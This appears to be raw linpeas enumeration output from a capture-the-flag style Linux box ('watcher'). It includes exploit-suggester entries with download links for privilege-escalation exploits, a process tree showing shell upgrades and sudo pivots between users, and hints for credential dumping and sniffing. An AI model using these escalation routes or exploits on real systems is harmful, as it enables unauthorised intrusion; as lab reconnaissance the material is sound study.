╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#dmesg-signature-verification-failed
dmesg Not Found

╔══════════╣ Executing Linux Exploit Suggester
╚ https://github.com/mzet-/linux-exploit-suggester
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
[+] [CVE-2021-4034] PwnKit

   Details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
   Exposure: probable
   Tags: [ ubuntu=10|11|12|13|14|15|16|17|18|19|20|21 ],debian=7|8|9|10|11,fedora,manjaro
   Download URL: https://codeload.github.com/berdav/CVE-2021-4034/zip/main

[+] [CVE-2021-3156] sudo Baron Samedit

   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: probable
   Tags: mint=19,[ ubuntu=18|20 ], debian=10
   Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main

[+] [CVE-2021-3156] sudo Baron Samedit 2

   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: probable
   Tags: centos=6|7|8,[ ubuntu=14|16|17|18|19|20 ], debian=9|10
   Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main

[+] [CVE-2018-18955] subuid_shell

   Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=1712
   Exposure: probable
   Tags: [ ubuntu=18.04 ]{kernel:4.15.0-20-generic},fedora=28{kernel:4.16.3-301.fc28}
   Download URL: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45886.zip
   Comments: CONFIG_USER_NS needs to be enabled

[+] [CVE-2022-32250] nft_object UAF (NFT_MSG_NEWSET)

   Details: https://research.nccgroup.com/2022/09/01/settlers-of-netlink-exploiting-a-limited-uaf-in-nf_tables-cve-2022-32250/
https://blog.theori.io/research/CVE-2022-32250-linux-kernel-lpe-2022/
   Exposure: less probable
   Tags: ubuntu=(22.04){kernel:5.15.0-27-generic}
   Download URL: https://raw.githubusercontent.com/theori-io/CVE-2022-32250-exploit/main/exp.c
   Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)

[+] [CVE-2022-2586] nft_object UAF

   Details: https://www.openwall.com/lists/oss-security/2022/08/29/5
   Exposure: less probable
   Tags: ubuntu=(20.04){kernel:5.12.13}
   Download URL: https://www.openwall.com/lists/oss-security/2022/08/29/5/1
   Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)

[+] [CVE-2021-22555] Netfilter heap out-of-bounds write

   Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
   Exposure: less probable
   Tags: ubuntu=20.04{kernel:5.8.0-*}
   Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
   Comments: ip_tables kernel module must be loaded

[+] [CVE-2019-18634] sudo pwfeedback

   Details: https://dylankatz.com/Analysis-of-CVE-2019-18634/
   Exposure: less probable
   Tags: mint=19
   Download URL: https://github.com/saleemrashid/sudo-cve-2019-18634/raw/master/exploit.c
   Comments: sudo configuration requires pwfeedback to be enabled.

[+] [CVE-2019-15666] XFRM_UAF

   Details: https://duasynt.com/blog/ubuntu-centos-redhat-privesc
   Exposure: less probable
   Download URL: 
   Comments: CONFIG_USER_NS needs to be enabled; CONFIG_XFRM needs to be enabled

[+] [CVE-2017-5618] setuid screen v4.5.0 LPE

   Details: https://seclists.org/oss-sec/2017/q1/184
   Exposure: less probable
   Download URL: https://www.exploit-db.com/download/https://www.exploit-db.com/exploits/41154

[+] [CVE-2017-0358] ntfs-3g-modprobe

   Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=1072
   Exposure: less probable
   Tags: ubuntu=16.04{ntfs-3g:2015.3.14AR.1-1build1},debian=7.0{ntfs-3g:2012.1.15AR.5-2.1+deb7u2},debian=8.0{ntfs-3g:2014.2.15AR.2-1+deb8u2}
   Download URL: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/41356.zip
   Comments: Distros use own versioning scheme. Manual verification needed. Linux headers must be installed. System must have at least two CPU cores.


╔══════════╣ Executing Linux Exploit Suggester 2
╚ https://github.com/jondonas/linux-exploit-suggester-2

╔══════════╣ Protections
═╣ AppArmor enabled? .............. You do not have enough privilege to read the profile set.
apparmor module is loaded.
═╣ grsecurity present? ............ grsecurity Not Found
═╣ PaX bins present? .............. PaX Not Found
═╣ Execshield enabled? ............ Execshield Not Found
═╣ SELinux enabled? ............... sestatus Not Found
═╣ Seccomp enabled? ............... disabled
═╣ AppArmor profile? .............. unconfined
═╣ User namespace? ................ enabled
═╣ Cgroup2 enabled? ............... enabled
═╣ Is ASLR enabled? ............... Yes
═╣ Printer? ....................... No
═╣ Is this a virtual machine? ..... Yes (xen)

                                   ╔═══════════╗
═══════════════════════════════════╣ Container ╠═══════════════════════════════════
                                   ╚═══════════╝
╔══════════╣ Container related tools present
/usr/bin/lxc
╔══════════╣ Am I Containered?
╔══════════╣ Container details
═╣ Is this a container? ........... No
═╣ Any running containers? ........ No


                                     ╔═══════╗
═════════════════════════════════════╣ Cloud ╠═════════════════════════════════════
                                     ╚═══════╝
═╣ Google Cloud Platform? ............... No
═╣ AWS ECS? ............................. No
═╣ AWS EC2? ............................. Yes
═╣ AWS Lambda? .......................... No

╔══════════╣ AWS EC2 Enumeration
ami-id: ami-093694236b624e8ad
instance-action: none
instance-id: i-0a6b1f107393cbf35
instance-life-cycle: on-demand
instance-type: t2.nano
region: eu-west-1

══╣ Account Info
{
  "Code" : "Success",
  "LastUpdated" : "2023-03-15T21:37:53Z",
  "AccountId" : "739930428441"
}

══╣ Network Info
Mac: 02:60:de:a6:7c:75/
Owner ID: 739930428441
Public Hostname: 
Security Groups: AllowEverything
Private IPv4s:

Subnet IPv4: 10.10.0.0/16
PrivateIPv6s:

Subnet IPv6: 
Public IPv4s:



══╣ IAM Role


══╣ User Data


                ╔════════════════════════════════════════════════╗
════════════════╣ Processes, Crons, Timers, Services and Sockets ╠════════════════
                ╚════════════════════════════════════════════════╝
╔══════════╣ Cleaned processes
╚ Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes
root         1  0.0  1.8 225344  8980 ?        Ss   21:19   0:03 /sbin/init auto automatic-ubiquity noprompt
root       414  0.0  3.5 127788 17636 ?        S<s  21:19   0:01 /lib/systemd/systemd-journald
root       431  0.0  0.3 105904  1872 ?        Ss   21:19   0:00 /sbin/lvmetad -f
root       442  0.0  1.1  46780  5508 ?        Ss   21:19   0:00 /lib/systemd/systemd-udevd
systemd+   590  0.0  0.6 141956  3184 ?        Ssl  21:20   0:00 /lib/systemd/systemd-timesyncd
  └─(Caps) 0x0000000002000000=cap_sys_time
systemd+   711  0.0  0.9  80080  4880 ?        Ss   21:20   0:00 /lib/systemd/systemd-networkd
  └─(Caps) 0x0000000000003c00=cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw
systemd+   728  0.0  0.9  70660  4864 ?        Ss   21:20   0:00 /lib/systemd/systemd-resolved
root       813  0.1  0.5 637024  2880 ?        Ssl  21:20   0:05 /usr/bin/lxcfs /var/lib/lxcfs/
root       820  0.0  1.3 286244  6600 ?        Ssl  21:20   0:00 /usr/lib/accountsservice/accounts-daemon[0m
root       823  0.0  2.7 169100 13724 ?        Ssl  21:20   0:00 /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers
root       824  0.0  5.2 728300 25812 ?        Ssl  21:20   0:00 /usr/bin/amazon-ssm-agent
message+   833  0.0  0.8  50060  4216 ?        Ss   21:20   0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
  └─(Caps) 0x0000000020000000=cap_audit_write
root       839  0.0  1.1  62156  5708 ?        Ss   21:20   0:00 /lib/systemd/systemd-logind
root       840  0.0  0.6  30028  2952 ?        Ss   21:20   0:00 /usr/sbin/cron -f
root      2174  0.0  0.6  57500  3224 ?        S    21:41   0:00  _ /usr/sbin/CRON -f
mat       2175  0.0  0.1   4628   760 ?        Ss   21:41   0:00      _ /bin/sh -c /home/toby/jobs/cow.sh
mat       2176  0.0  0.6  11592  3192 ?        S    21:41   0:00          _ /bin/bash /home/toby/jobs/cow.sh
mat       2178  0.0  1.0  21232  4960 ?        S    21:41   0:00              _ /bin/bash -i
root      2359  0.0  0.8  62220  4064 ?        S    22:07   0:00                  _ sudo -u will /usr/bin/python3 /home/mat/scripts/will_script.py 1
will      2360  0.0  1.9  28540  9424 ?        S    22:07   0:00                      _ /usr/bin/python3 /home/mat/scripts/will_script.py 1
will      2361  0.0  0.1   4628   900 ?        S    22:07   0:00                          _ sh -c /bin/bash
will      2362  0.0  0.2  11592  1212 ?        S    22:07   0:00                              _ /bin/bash
will      2363  0.0  0.6  11592  3184 ?        S    22:07   0:00                                  _ /bin/bash
will      2370  0.0  0.6  11592  3072 ?        S    22:08   0:00                                      _ bash
will      2371  0.0  1.9  39084  9720 ?        S    22:08   0:00                                          _ python3 -c import pty;pty.spawn("/bin/bash")
will      2372  0.0  1.0  21216  4976 pts/2    Ss   22:08   0:00                                              _ /bin/bash
will      2486  0.1  0.5   5360  2508 pts/2    S+   22:12   0:00                                                  _ /bin/sh ./linpeas.sh
will      5978  0.0  0.1   5360   888 pts/2    S+   22:20   0:00                                                      _ /bin/sh ./linpeas.sh
will      5982  0.0  0.7  38524  3640 pts/2    R+   22:20   0:00                                                      |   _ ps fauxwww
will      5981  0.0  0.1   5360   888 pts/2    S+   22:20   0:00                                                      _ /bin/sh ./linpeas.sh
daemon[0m     845  0.0  0.4  28332  2180 ?        Ss   21:20   0:00 /usr/sbin/atd -f
syslog     850  0.0  0.8 263036  4100 ?        Ssl  21:20   0:00 /usr/sbin/rsyslogd -n
root       882  0.0  0.4  29148  2064 ?        Ss   21:20   0:00 /usr/sbin/vsftpd /etc/vsftpd.conf
root       897  0.0  1.3 291456  6648 ?        Ssl  21:20   0:00 /usr/lib/policykit-1/polkitd --no-debug
root       900  0.0  3.1 185948 15500 ?        Ssl  21:20   0:00 /usr/bin/python3 /usr/share/unattended-upgrades/unattended-upgrade-shutdown --wait-for-signal
root       913  0.0  0.4  14664  2132 ttyS0    Ss+  21:20   0:00 /sbin/agetty -o -p -- u --keep-baud 115200,38400,9600 ttyS0 vt220
root       915  0.0  0.3  14888  1624 tty1     Ss+  21:20   0:00 /sbin/agetty -o -p -- u --noclear tty1 linux
root       930  0.0  1.0  72304  5240 ?        Ss   21:20   0:00 /usr/sbin/sshd -D
root       976  0.0  2.3 329256 11700 ?        Ss   21:20   0:00 /usr/sbin/apache2 -k start
www-data   983  0.0  2.4 334116 12080 ?        S    21:20   0:00  _ /usr/sbin/apache2 -k start
www-data   987 67.3  2.7 334116 13292 ?        R    21:20  40:25  _ /usr/sbin/apache2 -k start
www-data  2053  0.0  0.1   4628   860 ?        S    21:36   0:00  |   _ sh -c sh
www-data  2054  0.0  0.1   4628   824 ?        S    21:36   0:00  |       _ sh
www-data  2059  0.0  1.8  37296  9192 ?        S    21:37   0:00  |           _ python3 -c import pty;pty.spawn("/bin/bash")
www-data  2061  0.0  0.6  18508  3412 pts/1    Ss   21:37   0:00  |               _ /bin/bash
root      2082  0.0  0.7  60576  3712 pts/1    S    21:38   0:00  |                   _ sudo -u toby /bin/bash
toby      2083  0.0  0.9  19540  4444 pts/1    S+   21:38   0:00  |                       _ /bin/bash
www-data   988  0.0  1.7 333920  8516 ?        S    21:20   0:00  _ /usr/sbin/apache2 -k start
www-data   989  0.0  2.5 334124 12304 ?        S    21:20   0:00  _ /usr/sbin/apache2 -k start
www-data   990  0.0  1.6 333712  8104 ?        S    21:20   0:00  _ /usr/sbin/apache2 -k start
www-data  2036  0.0  2.6 334116 13140 ?        S    21:35   0:00  _ /usr/sbin/apache2 -k start
root      1121  0.0  4.5 713184 22392 ?        Ssl  21:20   0:00 /usr/lib/lxd/lxd --group lxd --logfile=/var/log/lxd/lxd.log
lxd       1292  0.0  0.0  51584   384 ?        S    21:20   0:00 dnsmasq --strict-order --bind-interfaces --pid-file=/var/lib/lxd/networks/lxdbr0/dnsmasq.pid --except-interface=lo --interface=lxdbr0 --quiet-dhcp --quiet-dhcp6 --quiet-ra --listen-address=10.14.179.1 --dhcp-no-override --dhcp-authoritative --dhcp-leasefile=/var/lib/lxd/networks/lxdbr0/dnsmasq.leases --dhcp-hostsfile=/var/lib/lxd/networks/lxdbr0/dnsmasq.hosts --dhcp-range 10.14.179.2,10.14.179.254,1h --listen-address=fd42:ee66:e342:a611::1 --enable-ra --dhcp-range ::,constructor:lxdbr0,ra-stateless,ra-names -s lxd -S /lxd/ --conf-file=/var/lib/lxd/networks/lxdbr0/dnsmasq.raw -u lxd
  └─(Caps) 0x0000000000003000=cap_net_admin,cap_net_raw
root      1360  0.0  0.0   1572    48 ?        Ss   21:20   0:00  _ /sbin/init
root      1688  0.0  0.0   1572    44 ?        Ss   21:20   0:00      _ udhcpc -b -R -p /var/run/udhcpc.eth0.pid -i eth0
root      1718  0.0  0.0   1588    60 ?        Ss   21:20   0:00      _ /sbin/syslogd -t

╔══════════╣ Binary processes permissions (non 'root root' and not belonging to current user)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes

╔══════════╣ Files opened by processes belonging to other users
╚ This is usually empty because of the lack of privileges to read other user processes information
COMMAND    PID  TID             USER   FD      TYPE DEVICE SIZE/OFF    NODE NAME

╔══════════╣ Processes with credentials in memory (root req)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#credentials-from-process-memory
gdm-password Not Found
gnome-keyring-daemon Not Found
lightdm Not Found
vsftpd process found (dump creds from memory as root)
apache2 process found (dump creds from memory as root)
sshd Not Found

╔══════════╣ Cron jobs
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#scheduled-cron-jobs
/usr/bin/crontab
incrontab Not Found
-rw-r--r-- 1 root root     761 Dec  3  2020 /etc/crontab

/etc/cron.d:
total 24
drwxr-xr-x  2 root root 4096 Dec  3  2020 .
drwxr-xr-x 95 root root 4096 Dec 12  2020 ..
-rw-r--r--  1 root root  589 Jan 14  2020 mdadm
-rw-r--r--  1 root root  712 Jan 17  2018 php
-rw-r--r--  1 root root  102 Nov 16  2017 .placeholder
-rw-r--r--  1 root root  191 Aug  6  2020 popularity-contest

/etc/cron.daily:
total 64
drwxr-xr-x  2 root root 4096 Dec 12  2020 .
drwxr-xr-x 95 root root 4096 Dec 12  2020 ..
-rwxr-xr-x  1 root root  539 Jul 16  2019 apache2
-rwxr-xr-x  1 root root  376 Nov 11  2019 apport
-rwxr-xr-x  1 root root 1478 Apr 20  2018 apt-compat
-rwxr-xr-x  1 root root  355 Dec 29  2017 bsdmainutils
-rwxr-xr-x  1 root root 1176 Nov  2  2017 dpkg
-rwxr-xr-x  1 root root  372 Aug 21  2017 logrotate
-rwxr-xr-x  1 root root 1065 Apr  7  2018 man-db
-rwxr-xr-x  1 root root  539 Jan 14  2020 mdadm
-rwxr-xr-x  1 root root  538 Mar  1  2018 mlocate
-rwxr-xr-x  1 root root  249 Jan 25  2018 passwd
-rw-r--r--  1 root root  102 Nov 16  2017 .placeholder
-rwxr-xr-x  1 root root 3477 Feb 21  2018 popularity-contest
-rwxr-xr-x  1 root root  246 Mar 21  2018 ubuntu-advantage-tools
-rwxr-xr-x  1 root root  214 Nov 12  2018 update-notifier-common

/etc/cron.hourly:
total 12
drwxr-xr-x  2 root root 4096 Aug  6  2020 .
drwxr-xr-x 95 root root 4096 Dec 12  2020 ..
-rw-r--r--  1 root root  102 Nov 16  2017 .placeholder

/etc/cron.monthly:
total 12
drwxr-xr-x  2 root root 4096 Aug  6  2020 .
drwxr-xr-x 95 root root 4096 Dec 12  2020 ..
-rw-r--r--  1 root root  102 Nov 16  2017 .placeholder

/etc/cron.weekly:
total 20
drwxr-xr-x  2 root root 4096 Aug  6  2020 .
drwxr-xr-x 95 root root 4096 Dec 12  2020 ..
-rwxr-xr-x  1 root root  723 Apr  7  2018 man-db
-rw-r--r--  1 root root  102 Nov 16  2017 .placeholder
-rwxr-xr-x  1 root root  211 Nov 12  2018 update-notifier-common

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
*/1 * * * * mat /home/toby/jobs/cow.sh

╔══════════╣ Systemd PATH
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#systemd-path-relative-paths
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin

╔══════════╣ Analyzing .service files
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#services
You can't write on systemd PATH

╔══════════╣ System timers
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#timers
NEXT                         LEFT          LAST                         PASSED      UNIT                         ACTIVATES
Wed 2023-03-15 22:39:00 UTC  17min left    Wed 2023-03-15 22:09:12 UTC  12min ago   phpsessionclean.timer        phpsessionclean.service
Thu 2023-03-16 02:49:41 UTC  4h 28min left Wed 2023-03-15 21:20:11 UTC  1h 1min ago motd-news.timer              motd-news.service
Thu 2023-03-16 06:12:23 UTC  7h left       Wed 2023-03-15 21:20:11 UTC  1h 1min ago apt-daily-upgrade.timer      apt-daily-upgrade.service
Thu 2023-03-16 06:26:32 UTC  8h left       Wed 2023-03-15 21:20:11 UTC  1h 1min ago apt-daily.timer              apt-daily.service
Thu 2023-03-16 21:34:46 UTC  23h left      Wed 2023-03-15 21:34:46 UTC  46min ago   systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service
Mon 2023-03-20 00:00:00 UTC  4 days left   Wed 2023-03-15 21:20:11 UTC  1h 1min ago fstrim.timer                 fstrim.service
n/a                          n/a           n/a                          n/a         snapd.snap-repair.timer      snapd.snap-repair.service
n/a                          n/a           n/a                          n/a         ureadahead-stop.timer        ureadahead-stop.service

╔══════════╣ Analyzing .timer files
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#timers

╔══════════╣ Analyzing .socket files
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sockets
/etc/systemd/system/sockets.target.wants/uuidd.socket is calling this writable listener: /run/uuidd/request
/lib/systemd/system/dbus.socket is calling this writable listener: /var/run/dbus/system_bus_socket
/lib/systemd/system/sockets.target.wants/dbus.socket is calling this writable listener: /var/run/dbus/system_bus_socket
/lib/systemd/system/sockets.target.wants/systemd-journald-dev-log.socket is calling this writable listener: /run/systemd/journal/dev-log
/lib/systemd/system/sockets.target.wants/systemd-journald.socket is calling this writable listener: /run/systemd/journal/stdout
/lib/systemd/system/sockets.target.wants/systemd-journald.socket is calling this writable listener: /run/systemd/journal/socket
/lib/systemd/system/syslog.socket is calling this writable listener: /run/systemd/journal/syslog
/lib/systemd/system/systemd-journald-dev-log.socket is calling this writable listener: /run/systemd/journal/dev-log
/lib/systemd/system/systemd-journald.socket is calling this writable listener: /run/systemd/journal/stdout
/lib/systemd/system/systemd-journald.socket is calling this writable listener: /run/systemd/journal/socket
/lib/systemd/system/uuidd.socket is calling this writable listener: /run/uuidd/request

╔══════════╣ Unix Sockets Listening
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sockets
/run/acpid.socket
  └─(Read Write)
/run/dbus/system_bus_socket
  └─(Read Write)
/run/lvm/lvmetad.socket
/run/lvm/lvmpolld.socket
/run/snapd-snap.socket
  └─(Read Write)
/run/snapd.socket
  └─(Read Write)
/run/systemd/journal/dev-log
  └─(Read Write)
/run/systemd/journal/socket
  └─(Read Write)
/run/systemd/journal/stdout
  └─(Read Write)
/run/systemd/journal/syslog
  └─(Read Write)
/run/systemd/notify
  └─(Read Write)
/run/systemd/private
  └─(Read Write)
/run/udev/control
/run/uuidd/request
  └─(Read Write)
/var/lib/lxd/containers/ignite/command
/var/lib/lxd/devlxd/sock
  └─(Read Write)
/var/lib/lxd/unix.socket
/var/run/dbus/system_bus_socket
  └─(Read Write)

╔══════════╣ D-Bus config files
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#d-bus
Possible weak user policy found on /etc/dbus-1/system.d/dnsmasq.conf (        <policy user="dnsmasq">)
Possible weak user policy found on /etc/dbus-1/system.d/org.freedesktop.thermald.conf (        <policy group="power">)

╔══════════╣ D-Bus Service Objects list
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#d-bus
NAME                                 PID PROCESS         USER             CONNECTION    UNIT                      SESSION    DESCRIPTION        
:1.0                                 711 systemd-network systemd-network  :1.0          systemd-networkd.service  -          -                  
:1.1                                 728 systemd-resolve systemd-resolve  :1.1          systemd-resolved.service  -          -                  
:1.2                                   1 systemd         root             :1.2          init.scope                -          -                  
:1.25                               9186 busctl          will             :1.25         cron.service              -          -                  
:1.3                                 839 systemd-logind  root             :1.3          systemd-logind.service    -          -                  
:1.4                                 820 accounts-daemon[0m root             :1.4          accounts-daemon.service   -          -                  
:1.5                                 897 polkitd         root             :1.5          polkit.service            -          -                  
:1.7                                 823 networkd-dispat root             :1.7          networkd-dispatcher.se…ce -          -                  
:1.9                                 900 unattended-upgr root             :1.9          unattended-upgrades.se…ce -          -                  
com.ubuntu.LanguageSelector            - -               -                (activatable) -                         -         
com.ubuntu.SoftwareProperties          - -               -                (activatable) -                         -         
io.netplan.Netplan                     - -               -                (activatable) -                         -         
org.freedesktop.Accounts             820 accounts-daemon[0m root             :1.4          accounts-daemon.service   -          -                  
org.freedesktop.DBus                   1 systemd         root             -             init.scope                -          -                  
org.freedesktop.PolicyKit1           897 polkitd         root             :1.5          polkit.service            -          -                  
org.freedesktop.hostname1              - -               -                (activatable) -                         -         
org.freedesktop.locale1                - -               -                (activatable) -                         -         
org.freedesktop.login1               839 systemd-logind  root             :1.3          systemd-logind.service    -          -                  
org.freedesktop.network1             711 systemd-network systemd-network  :1.0          systemd-networkd.service  -          -                  
org.freedesktop.resolve1             728 systemd-resolve systemd-resolve  :1.1          systemd-resolved.service  -          -                  
org.freedesktop.systemd1               1 systemd         root             :1.2          init.scope                -          -                  
org.freedesktop.thermald               - -               -                (activatable) -                         -         
org.freedesktop.timedate1              - -               -                (activatable) -                         -         


                              ╔═════════════════════╗
══════════════════════════════╣ Network Information ╠══════════════════════════════
                              ╚═════════════════════╝
╔══════════╣ Hostname, hosts and DNS
watcher
127.0.0.1 localhost
127.0.1.1 watcher

::1     ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

nameserver 127.0.0.53
options edns0
search eu-west-1.compute.internal

╔══════════╣ Interfaces
# symbolic names for networks, see networks(5) for more information
link-local 169.254.0.0
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 9001
        inet 10.10.46.15  netmask 255.255.0.0  broadcast 10.10.255.255
        inet6 fe80::60:deff:fea6:7c75  prefixlen 64  scopeid 0x20<link>
        ether 02:60:de:a6:7c:75  txqueuelen 1000  (Ethernet)
        RX packets 1810  bytes 955510 (955.5 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 1438  bytes 393737 (393.7 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 167  bytes 14734 (14.7 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 167  bytes 14734 (14.7 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lxdbr0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.14.179.1  netmask 255.255.255.0  broadcast 0.0.0.0
        inet6 fe80::10d9:7bff:fea4:d7a6  prefixlen 64  scopeid 0x20<link>
        inet6 fd42:ee66:e342:a611::1  prefixlen 64  scopeid 0x0<global>
        ether fe:25:db:5a:44:da  txqueuelen 1000  (Ethernet)
        RX packets 22  bytes 2612 (2.6 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 44  bytes 6153 (6.1 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

vethV01BP3: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet6 fe80::fc25:dbff:fe5a:44da  prefixlen 64  scopeid 0x20<link>
        ether fe:25:db:5a:44:da  txqueuelen 1000  (Ethernet)
        RX packets 22  bytes 2920 (2.9 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 53  bytes 6567 (6.5 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0


╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports
tcp        0      0 10.14.179.1:53          0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp6       0      0 :::80                   :::*                    LISTEN      -                   
tcp6       0      0 fd42:ee66:e342:a611::53 :::*                    LISTEN      -                   
tcp6       0      0 fe80::10d9:7bff:fea4:53 :::*                    LISTEN      -                   
tcp6       0      0 :::21                   :::*                    LISTEN      -                   
tcp6       0      0 :::22                   :::*                    LISTEN      -                   

╔══════════╣ Can I sniff with tcpdump?
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sniffing
You can sniff with tcpdump!



                               ╔═══════════════════╗
═══════════════════════════════╣ Users Information ╠═══════════════════════════════
                               ╚═══════════════════╝
╔══════════╣ My user
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#users
uid=1000(will) gid=1000(will) groups=1000(will),4(adm)

╔══════════╣ Do I have PGP keys?
/usr/bin/gpg
netpgpkeys Not Found
netpgp Not Found

╔══════════╣ Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid

╔══════════╣ Checking sudo tokens
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#reusing-sudo-tokens
ptrace protection is enabled (1)
gdb wasn't found in PATH, this might still be vulnerable but linpeas won't be able to check it

╔══════════╣ Checking Pkexec policy
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation/interesting-groups-linux-pe#pe-method-2

[Configuration]
AdminIdentities=unix-user:0
[Configuration]
AdminIdentities=unix-group:sudo;unix-group:admin

╔══════════╣ Superusers
root:x:0:0:root:/root:/bin/bash

╔══════════╣ Users with console
mat:x:1002:1002:,#,,:/home/mat:/bin/bash
root:x:0:0:root:/root:/bin/bash
toby:x:1003:1003:,,,:/home/toby:/bin/bash
will:x:1000:1000:will:/home/will:/bin/bash

╔══════════╣ All users & groups
uid=0(root) gid=0(root) groups=0(root)
uid=1000(will) gid=1000(will) groups=1000(will),4(adm)
uid=1001(ftpuser) gid=1001(ftpuser) groups=1001(ftpuser)
uid=1002(mat) gid=1002(mat) groups=1002(mat)
uid=1003(toby) gid=1003(toby) groups=1003(toby)
uid=100(systemd-network) gid=102(systemd-network) groups=102(systemd-network)
uid=101(systemd-resolve) gid=103(systemd-resolve) groups=103(systemd-resolve)
uid=102(syslog) gid=106(syslog) groups=106(syslog),4(adm)
uid=103(messagebus) gid=107(messagebus) groups=107(messagebus)
uid=104(_apt) gid=65534(nogroup) groups=65534(nogroup)
uid=105(lxd) gid=65534(nogroup) groups=65534(nogroup)
uid=106(uuidd) gid=110(uuidd) groups=110(uuidd)
uid=107(dnsmasq) gid=65534(nogroup) groups=65534(nogroup)
uid=108(landscape) gid=112(landscape) groups=112(landscape)
uid=109(pollinate) gid=1(daemon[0m) groups=1(daemon[0m)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=110(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=111(ftp) gid=114(ftp) groups=114(ftp)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=1(daemon[0m) gid=1(daemon[0m) groups=1(daemon[0m)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=5(games) gid=60(games) groups=60(games)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=6(man) gid=12(man) groups=12(man)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)

╔══════════╣ Login now
 22:22:30 up  1:02,  0 users,  load average: 3.94, 3.18, 2.06
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT

╔══════════╣ Last logons
reboot   system boot  Thu Dec  3 02:15:17 2020 - Thu Dec  3 02:28:07 2020  (00:12)     0.0.0.0
reboot   system boot  Thu Dec  3 02:13:28 2020 - Thu Dec  3 02:28:07 2020  (00:14)     0.0.0.0
